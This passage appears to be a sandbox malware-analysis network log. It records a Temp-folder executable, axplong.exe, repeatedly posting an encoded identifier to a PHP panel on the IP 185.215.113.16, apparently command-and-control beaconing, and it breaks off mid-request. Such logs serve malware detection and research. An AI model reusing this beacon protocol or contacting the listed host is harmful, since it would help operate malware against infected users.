                    Sep 27, 2024 05:53:20.858191013 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:21.099672079 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.449751185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:21.218667984 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:21.977622986 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:21.979022980 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:22.209462881 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.449752185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:22.330441952 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:23.089411020 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:23.090346098 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:23.333048105 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.449753185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:23.521847963 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:24.494335890 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:24.495405912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:24.753993988 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.449754185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:24.872675896 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:25.563750982 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:25.564929962 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:25.786482096 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.449755185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:25.905311108 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:26.603712082 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:26.605684042 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:26.829114914 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.449756185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:26.950301886 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:27.685352087 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:27.686184883 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:27.967570066 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.449757185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:28.075129986 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:28.784866095 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:28.785811901 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:29.012288094 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449758185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:29.134426117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:29.860305071 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:29.862093925 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:30.104621887 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449759185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:30.218231916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:30.918351889 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:30.919238091 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:31.143484116 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449760185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:31.264282942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:31.983756065 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:32.005872011 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:32.301059961 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.449761185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:32.426239967 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:33.119906902 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:33.120877981 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:33.343898058 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.449762185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:33.468365908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:34.187731981 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:34.188659906 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
